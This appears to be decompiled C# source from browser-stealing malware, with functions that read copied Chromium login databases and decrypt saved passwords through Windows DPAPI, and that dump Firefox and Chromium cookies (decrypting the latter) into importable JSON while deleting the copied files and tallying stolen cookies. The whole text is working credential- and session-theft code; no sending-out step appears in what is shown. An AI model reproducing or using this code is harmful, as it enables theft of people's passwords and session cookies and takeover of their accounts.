// Token: 0x06000012 RID: 18 RVA: 0x00003E94 File Offset: 0x00002E94 private static void GetPass(string name) { string text = Program.filesFolder + name; if (File.Exists(text)) { string tableName = "logins"; byte[] entropyBytes = null; SqlHandler sqlHandler = new SqlHandler(text); sqlHandler.ReadTable(tableName); int rowCount = sqlHandler.GetRowCount(); for (int i = 0; i < rowCount; i++) { string text2; byte[] bytes = DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 5)), entropyBytes, out text2); string @string = new UTF8Encoding(true).GetString(bytes); string text3 = sqlHandler.GetValue(i, 0).ToString(); string text4 = sqlHandler.GetValue(i, 3).ToString(); bool flag = false; if (text4.Length != 0 && @string.Length != 0) { foreach (string a in BrowsersData.Address) { if (a == text3) { using (List <string> .Enumerator enumerator2 = BrowsersData.Login.GetEnumerator()) { while (enumerator2.MoveNext()) { string a2 = enumerator2.Current; if (a2 == text4) { using (List <string> .Enumerator enumerator3 = BrowsersData.Password.GetEnumerator()) { while (enumerator3.MoveNext()) { string a3 = enumerator3.Current; if (a3 == @string) { flag = true; break; } } break; } } } break; } } } if (!flag) { BrowsersData.Address.Add(text3); BrowsersData.Login.Add(text4); BrowsersData.Password.Add(@string); } } } } }
// Token: 0x06000029 RID: 41 RVA: 0x0000509C File Offset: 0x0000409C public static byte[] Decrypt(byte[] cipherTextBytes, byte[] entropyBytes, out string description) { DPAPI.DATA_BLOB data_BLOB = default(DPAPI.DATA_BLOB); DPAPI.DATA_BLOB data_BLOB2 = default(DPAPI.DATA_BLOB); DPAPI.DATA_BLOB data_BLOB3 = default(DPAPI.DATA_BLOB); DPAPI.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = default(DPAPI.CRYPTPROTECT_PROMPTSTRUCT); cryptprotect_PROMPTSTRUCT.cbSize = Marshal.SizeOf(typeof(DPAPI.CRYPTPROTECT_PROMPTSTRUCT)); cryptprotect_PROMPTSTRUCT.dwPromptFlags = 0; cryptprotect_PROMPTSTRUCT.hwndApp = IntPtr.Zero; cryptprotect_PROMPTSTRUCT.szPrompt = null; description = string.Empty; byte[] result; try { try { if (cipherTextBytes == null) { cipherTextBytes = new byte[0]; } data_BLOB2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length); if (data_BLOB2.pbData == IntPtr.Zero) { throw new Exception(string.Empty); } data_BLOB2.cbData = cipherTextBytes.Length; Marshal.Copy(cipherTextBytes, 0, data_BLOB2.pbData, cipherTextBytes.Length); } catch (Exception innerException) { throw new Exception(string.Empty, innerException); } try { if (entropyBytes == null) { entropyBytes = new byte[0]; } data_BLOB3.pbData = Marshal.AllocHGlobal(entropyBytes.Length); if (data_BLOB3.pbData == IntPtr.Zero) { throw new Exception(string.Empty); } data_BLOB3.cbData = entropyBytes.Length; Marshal.Copy(entropyBytes, 0, data_BLOB3.pbData, entropyBytes.Length); } catch (Exception innerException2) { throw new Exception(string.Empty, innerException2); } int dwFlags = 1; if (!DPAPI.CryptUnprotectData(ref data_BLOB2, ref description, ref data_BLOB3, IntPtr.Zero, ref cryptprotect_PROMPTSTRUCT, dwFlags, ref data_BLOB)) { int lastWin32Error = Marshal.GetLastWin32Error(); throw new Exception(string.Empty, new Win32Exception(lastWin32Error)); } byte[] array = new byte[data_BLOB.cbData]; Marshal.Copy(data_BLOB.pbData, array, 0, data_BLOB.cbData); result = array; } catch (Exception innerException3) { throw new Exception(string.Empty, innerException3); } finally { if (data_BLOB.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(data_BLOB.pbData); } if (data_BLOB2.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(data_BLOB2.pbData); } if (data_BLOB3.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(data_BLOB3.pbData); } } return(result); }
// Token: 0x06000010 RID: 16 RVA: 0x000039F4 File Offset: 0x000029F4 private static string GetCookies(string name) { string text = Program.filesFolder + name; int num = 0; if (File.Exists(text)) { if (name.Contains("Moz")) { try { string tableName = "moz_cookies"; SqlHandler sqlHandler = new SqlHandler(text); sqlHandler.ReadTable(tableName); int rowCount = sqlHandler.GetRowCount(); Program.TryFunction(new Program.function(File.Delete), text, 10, 200); string text2 = ""; for (int i = 0; i < rowCount; i++) { string text3 = sqlHandler.GetValue(i, 4).ToString(); string text4; if (sqlHandler.GetValue(i, 11).ToString() == "false") { text4 = "false"; } else { text4 = "true"; } string text5; if (sqlHandler.GetValue(i, 10).ToString() == "false") { text5 = "false"; } else { text5 = "true"; } if (text3 != "") { if (text3.Contains("\"")) { text3 = text3.Replace("\"", ""); } if (!text3.Contains("\\")) { string text6 = text2; text2 = string.Concat(new string[] { text6, "{\"domain\":\"", sqlHandler.GetValue(i, 5), "\",\"expirationDate\":", sqlHandler.GetValue(i, 7), ",\"hostOnly\":false,\"httpOnly\":", text4, ",\"name\":\"", sqlHandler.GetValue(i, 3), "\",\"path\":\"", sqlHandler.GetValue(i, 6), "\",\"sameSite\":null,\"secure\":", text5, ",\"session\":false,\"storeId\":null,\"value\":\"", text3, "\",\"id\":1}," }); num++; } } } BrowsersData.CookiesCount += num; return(text2); } catch { return(""); } } try { string tableName2 = "cookies"; byte[] entropyBytes = null; SqlHandler sqlHandler2 = new SqlHandler(text); sqlHandler2.ReadTable(tableName2); int rowCount2 = sqlHandler2.GetRowCount(); Program.TryFunction(new Program.function(File.Delete), text, 10, 200); string text7 = ""; for (int j = 0; j < rowCount2; j++) { byte[] bytes = Encoding.Default.GetBytes(sqlHandler2.GetValue(j, 12)); string text8; byte[] bytes2 = DPAPI.Decrypt(bytes, entropyBytes, out text8); string text9 = new UTF8Encoding(true).GetString(bytes2); string text10; if (sqlHandler2.GetValue(j, 7).ToString() == "false") { text10 = "false"; } else { text10 = "true"; } string text11; if (sqlHandler2.GetValue(j, 6).ToString() == "false") { text11 = "false"; } else { text11 = "true"; } if (text9 != "") { if (text9.Contains("\"")) { text9 = text9.Replace("\"", ""); } if (!text9.Contains("\\")) { string text12 = text7; text7 = string.Concat(new string[] { text12, "{\"domain\":\"", sqlHandler2.GetValue(j, 1), "\",\"expirationDate\":", sqlHandler2.GetValue(j, 5), ",\"hostOnly\":false,\"httpOnly\":", text10, ",\"name\":\"", sqlHandler2.GetValue(j, 2), "\",\"path\":\"", sqlHandler2.GetValue(j, 4), "\",\"sameSite\":null,\"secure\":", text11, ",\"session\":false,\"storeId\":null,\"value\":\"", text9, "\",\"id\":", sqlHandler2.GetValue(j, 11), "}," }); num++; } } } BrowsersData.CookiesCount += num; return(text7); } catch { return(""); } } return(""); }